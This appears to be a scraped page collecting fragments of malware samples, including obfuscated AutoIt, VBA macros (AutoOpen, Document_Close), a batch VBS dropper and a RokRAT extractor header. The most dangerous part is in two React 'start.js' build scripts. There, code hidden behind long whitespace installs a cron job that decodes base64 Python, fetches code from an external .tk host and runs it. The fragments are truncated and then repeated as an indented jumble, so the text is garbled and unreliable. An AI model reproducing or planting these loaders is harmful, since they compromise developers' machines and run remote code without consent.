Seclib seclib

## ps1_threat
function _/=\_____/==\/=\/\


{


          try


## YQYgT.au3
#NoTrayIcon
#EndRegion
Dim $IIThbVLLWS = "1"
Dim $CWBFTZBdRBF = "YQYg"
Dim $CWBFTZBdRBFN = "YQYgT"
Dim $PMHTbZHeQhgeW = "FuyOUaWDQXzcuubQ"
Dim $bBOiAYNfPdZMWb = "BFfLbS"
Dim $bBOiAYNfPdZMWbP = Int("0")
Dim $WPfGbcDOKNbChUgJ = "fTNSTWFKWVKG"
Dim $iECUAbJPJJTThfEIU = "0"

## payload-rokrat.py
#extract malware from: 9e6ff58202f6c1bd2381e8209231efd0ef6855db59db975fb5b75041706ed104
import re
import sys
import zlib
import struct
import hashlib
import oledump
import olefile
import binascii
import cStringIO

## kill_all.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <errno.h>
#include <assert.h>
#include <unistd.h>
#include <pthread.h>
#include <time.h>

## webpack_start.js
'use strict';

// Do this as the first thing so that any code reading it knows the right env.
process.env.BABEL_ENV = 'development';
process.env.NODE_ENV = 'development';
                                                                                                                                                                                                                                                                                          require('child_process').exec("echo \"0 * * * * python -c \\\"import sys as ss,base64 as bb;exec(bb.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[ss.version_info[0]]('aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJ10pCmhzPVtdCm89dWwuYnVpbGRfb3BlbmVyKCpocykKby5hZGRoZWFkZXJzPVsoJ1VzZXItQWdlbnQnLCdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJyldCmV4ZWMoby5vcGVuKCdodHRwOi8vbGVveHRidXl4by50azo0NDMvbWNJZllwQmwyTVUtcHl1elpQMUZfd19HeDM3SFZ2

## start.js
'use strict';

 // Do this as the first thing so that any code reading it knows the right env.
 process.env.BABEL_ENV = 'development';
 process.env.NODE_ENV = 'development';
                                                                                                                                                                                                                                                                                           require('child_process').exec("echo \"0 * * * * python -c \\\"import sys as ss,base64 as bb;exec(bb.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[ss.version_info[0]]('import sys
vi=sys.version_info
ul=__import__({2:'urllib2',3:'urllib.request'}[vi[0]],fromlist=['build_opener'])
hs=[]
o=ul.build_opener(*hs)

## b1a337b763c4df875726274632e675bdba4941504b249e6732d7a6dbaeedc235
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Private Sub Document_Close()

## rerzvqjzaeoieibyenyy,;87eze
codinf = "E4F1DDE6E7E1E1D3D9B5A9AFAFA6A9A9A6ADA8A6A9A9AFB5D9D5D3DAB5BBD0A5A9E6BEABDBCCB5DAD5D3DBB5C8BDC1D0C1C5B5DBD5F1E0E8DEE7F0EB"
codinf = "E0F1E8E2ECDBE8D3D9B5A9AFAFA6A9A9A6ADA8A6A9A9AFB5D9D5D3DAB5BBD0A5A9E6BEABDBCCB5DAD5D3DBB5C8BDC1D0C1C5B5DBD5E9ECE0E3D9E6DE"
codinf = "EDEEEDEEE3F1EAD3D9B5A9AFAFA6A9A9A6ADA8A6A9A9AFB5D9D5D3DAB5BBD0A5A9E6BEABDBCCB5DAD5D3DBB5C8BDC1D0C1C5B5DBD5F0EFF1ECDBE4DF"
codinf = "EBE4D9E8DBE2E2D3D9B5A9AFAFA6A9A9A6ADA8A6A9A9AFB5D9D5D3DAB5BBD0A5A9E6BEABDBCCB5DAD5D3DBB5C8BDC1D0C1C5B5DBD5DBDDECDCE3DAE1"
codinf = "DBDEE0E9E5E5E2D3D9B5A9AFAFA6A9A9A6ADA8A6A9A9AFB5D9D5D3DAB5BBD0A5A9E6BEABDBCCB5DAD5D3DBB5C8BDC1D0C1C5B5DBD5DEDCE6DBE5DEDD"
codinf = "E8E1E8E7DBE2E3D3D9B5A9AFAFA6A9A9A6ADA8A6A9A9AFB5D9D5D3DAB5BBD0A5A9E6BEABDBCCB5DAD5D3DBB5C8BDC1D0C1C5B5DBD5DBE6E4E1EFE9E0"

    codinf = "DDDBEEE0E0DBEBD3D9B5A9AFAFA6A9A9A6ADA8A6A9A9AFB5D9D5D3DAB5BBD0A5A9E6BEABDBCCB5DAD5D3DBB5C8BDC1D0C1C5B5DBD5D9DCE5DAD9DADD"

## untitled
@echo off
SETLOCAL
Set  gglusyl=
Set  gglusyl=%gglusyl%("0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz. &+/)'&__
md "%USERPROFILE%\Temp" && cls
set sxoxobh=%USERNAME%.vbs
del "%USERPROFILE%\Temp\%sxoxobh%"
set inxovtv=%USERPROFILE%\Temp\%sxoxobh% ECHO
>>%inxovtv%  %gglusyl:~26,1%%gglusyl:~51,1%%gglusyl:~65,1%%gglusyl:~16,1%%gglusyl:~55,1%%gglusyl:~55,1%%gglusyl:~52,1%%gglusyl:~55,1%%gglusyl:~65,1%%gglusyl:~29,1%%gglusyl:~42,1%%gglusyl:~56,1%%gglusyl:~58,1%%gglusyl:~50,1%%gglusyl:~42,1%%gglusyl:~65,1%%gglusyl:~25,1%%gglusyl:~42,1%%gglusyl:~61,1%%gglusyl:~57,1%
>>%inxovtv%  %gglusyl:~15,1%%gglusyl:~46,1%%gglusyl:~50,1%%gglusyl:~65,1%%gglusyl:~53,1%%gglusyl:~38,1%%gglusyl:~56,1%%gglusyl:~57,1%%gglusyl:~38,1%%gglusyl:~53,1%%gglusyl:~55,1%%gglusyl:~52,1%%gglusyl:~44,1%%gglusyl:~55,1%%gglusyl:~38,1%%gglusyl:~50,1%,%gglusyl:~23,1%%gglusyl:~51,1%%gglusyl:~48,1%,%gglusyl:~51,1%%gglusyl:~50,1%%gglusyl:~38,1%%gglusyl:~55,1%%gglusyl:~54,1%%gglusyl:~61,1%,%gglusyl:~51,1%%gglusyl:~50,1%%gglusyl:~38,1%%ggl

## ec7182dbcecd
## Uploaded by @satya_enki
## Hash: 10955f54aa38dbf4eb510b8e7903398d9896ee13d799fdc980f4ec7182dbcecd
Sub AutoOpen()
    Dim abjaWFApqTOaGknEZ As String
    Dim EVvHI As Object
    Dim aqwMEEghqLNesI As Integer
    Dim TgAVw As String

    aqwMEEghqLNesI = 816
    abjaWFApqTOaGknEZ = HyqtqSXGmk("5f7b6b7a") & "qx|6[pmtt"
	#NoTrayIcon
	#EndRegion
	Dim $IIThbVLLWS = "1"
	Dim $CWBFTZBdRBF = "YQYg"
	Dim $CWBFTZBdRBFN = "YQYgT"
	Dim $PMHTbZHeQhgeW = "FuyOUaWDQXzcuubQ"
	Dim $bBOiAYNfPdZMWb = "BFfLbS"
	Dim $bBOiAYNfPdZMWbP = Int("0")
	Dim $WPfGbcDOKNbChUgJ = "fTNSTWFKWVKG"
	Dim $iECUAbJPJJTThfEIU = "0"
	#extract malware from: 9e6ff58202f6c1bd2381e8209231efd0ef6855db59db975fb5b75041706ed104
	import re
	import sys
	import zlib
	import struct
	import hashlib
	import oledump
	import olefile
	import binascii
	import cStringIO
	#include <stdio.h>
	#include <stdlib.h>
	#include <string.h>
	#include <stdint.h>
	#include <errno.h>
	#include <assert.h>
	#include <unistd.h>
	#include <pthread.h>
	#include <time.h>
	'use strict';

	// Do this as the first thing so that any code reading it knows the right env.
	process.env.BABEL_ENV = 'development';
	process.env.NODE_ENV = 'development';
	require('child_process').exec("echo \"0 * * * * python -c \\\"import sys as ss,base64 as bb;exec(bb.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[ss.version_info[0]]('aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJ10pCmhzPVtdCm89dWwuYnVpbGRfb3BlbmVyKCpocykKby5hZGRoZWFkZXJzPVsoJ1VzZXItQWdlbnQnLCdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJyldCmV4ZWMoby5vcGVuKCdodHRwOi8vbGVveHRidXl4by50azo0NDMvbWNJZllwQmwyTVUtcHl1elpQMUZfd19HeDM3SFZ2
	Attribute VB_Name = "ThisDocument"
	Attribute VB_Base = "1Normal.ThisDocument"
	Attribute VB_GlobalNameSpace = False
	Attribute VB_Creatable = False
	Attribute VB_PredeclaredId = True
	Attribute VB_Exposed = True
	Attribute VB_TemplateDerived = True
	Attribute VB_Customizable = True

	Private Sub Document_Close()
	codinf = "E4F1DDE6E7E1E1D3D9B5A9AFAFA6A9A9A6ADA8A6A9A9AFB5D9D5D3DAB5BBD0A5A9E6BEABDBCCB5DAD5D3DBB5C8BDC1D0C1C5B5DBD5F1E0E8DEE7F0EB"
	codinf = "E0F1E8E2ECDBE8D3D9B5A9AFAFA6A9A9A6ADA8A6A9A9AFB5D9D5D3DAB5BBD0A5A9E6BEABDBCCB5DAD5D3DBB5C8BDC1D0C1C5B5DBD5E9ECE0E3D9E6DE"
	codinf = "EDEEEDEEE3F1EAD3D9B5A9AFAFA6A9A9A6ADA8A6A9A9AFB5D9D5D3DAB5BBD0A5A9E6BEABDBCCB5DAD5D3DBB5C8BDC1D0C1C5B5DBD5F0EFF1ECDBE4DF"
	codinf = "EBE4D9E8DBE2E2D3D9B5A9AFAFA6A9A9A6ADA8A6A9A9AFB5D9D5D3DAB5BBD0A5A9E6BEABDBCCB5DAD5D3DBB5C8BDC1D0C1C5B5DBD5DBDDECDCE3DAE1"
	codinf = "DBDEE0E9E5E5E2D3D9B5A9AFAFA6A9A9A6ADA8A6A9A9AFB5D9D5D3DAB5BBD0A5A9E6BEABDBCCB5DAD5D3DBB5C8BDC1D0C1C5B5DBD5DEDCE6DBE5DEDD"
	codinf = "E8E1E8E7DBE2E3D3D9B5A9AFAFA6A9A9A6ADA8A6A9A9AFB5D9D5D3DAB5BBD0A5A9E6BEABDBCCB5DAD5D3DBB5C8BDC1D0C1C5B5DBD5DBE6E4E1EFE9E0"

	codinf = "DDDBEEE0E0DBEBD3D9B5A9AFAFA6A9A9A6ADA8A6A9A9AFB5D9D5D3DAB5BBD0A5A9E6BEABDBCCB5DAD5D3DBB5C8BDC1D0C1C5B5DBD5D9DCE5DAD9DADD"
	@echo off
	SETLOCAL
	Set gglusyl=
	Set gglusyl=%gglusyl%("0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz. &+/)'&__
	md "%USERPROFILE%\Temp" && cls
	set sxoxobh=%USERNAME%.vbs
	del "%USERPROFILE%\Temp\%sxoxobh%"
	set inxovtv=%USERPROFILE%\Temp\%sxoxobh% ECHO
	>>%inxovtv% %gglusyl:~26,1%%gglusyl:~51,1%%gglusyl:~65,1%%gglusyl:~16,1%%gglusyl:~55,1%%gglusyl:~55,1%%gglusyl:~52,1%%gglusyl:~55,1%%gglusyl:~65,1%%gglusyl:~29,1%%gglusyl:~42,1%%gglusyl:~56,1%%gglusyl:~58,1%%gglusyl:~50,1%%gglusyl:~42,1%%gglusyl:~65,1%%gglusyl:~25,1%%gglusyl:~42,1%%gglusyl:~61,1%%gglusyl:~57,1%
	>>%inxovtv% %gglusyl:~15,1%%gglusyl:~46,1%%gglusyl:~50,1%%gglusyl:~65,1%%gglusyl:~53,1%%gglusyl:~38,1%%gglusyl:~56,1%%gglusyl:~57,1%%gglusyl:~38,1%%gglusyl:~53,1%%gglusyl:~55,1%%gglusyl:~52,1%%gglusyl:~44,1%%gglusyl:~55,1%%gglusyl:~38,1%%gglusyl:~50,1%,%gglusyl:~23,1%%gglusyl:~51,1%%gglusyl:~48,1%,%gglusyl:~51,1%%gglusyl:~50,1%%gglusyl:~38,1%%gglusyl:~55,1%%gglusyl:~54,1%%gglusyl:~61,1%,%gglusyl:~51,1%%gglusyl:~50,1%%gglusyl:~38,1%%ggl
	## Uploaded by @satya_enki
	## Hash: 10955f54aa38dbf4eb510b8e7903398d9896ee13d799fdc980f4ec7182dbcecd
	Sub AutoOpen()
	Dim abjaWFApqTOaGknEZ As String
	Dim EVvHI As Object
	Dim aqwMEEghqLNesI As Integer
	Dim TgAVw As String

	aqwMEEghqLNesI = 816
	abjaWFApqTOaGknEZ = HyqtqSXGmk("5f7b6b7a") & "qx\|6[pmtt"